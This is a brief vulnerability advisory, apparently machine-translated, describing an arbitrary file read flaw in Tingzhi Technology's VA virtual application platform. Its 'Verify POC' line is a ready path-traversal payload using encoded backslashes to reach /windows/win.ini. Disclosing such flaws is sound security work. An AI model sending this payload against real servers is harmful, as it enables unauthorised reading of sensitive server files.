Post

Tingzhi Technology Va Virtual Application Platform Arbitrary File Reading Vulnerability

Tingzhi Technology Va Virtual Application Platform Arbitrary File Reading Vulnerability

Tingzhi Technology VA virtual application platform Arbitrary file reading vulnerability

Vulnerability Description

Tingzhi Technology VA virtual application platform There is a vulnerability to read any file, and attackers can obtain sensitive information from the server through the vulnerability.

Vulnerability Impact

Tingzhi Technology VA virtual application platform

Network surveying and mapping

Vulnerability reappears

Login page

img

Verify POC

1
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini

img

This post is licensed under CC BY 4.0 by the author.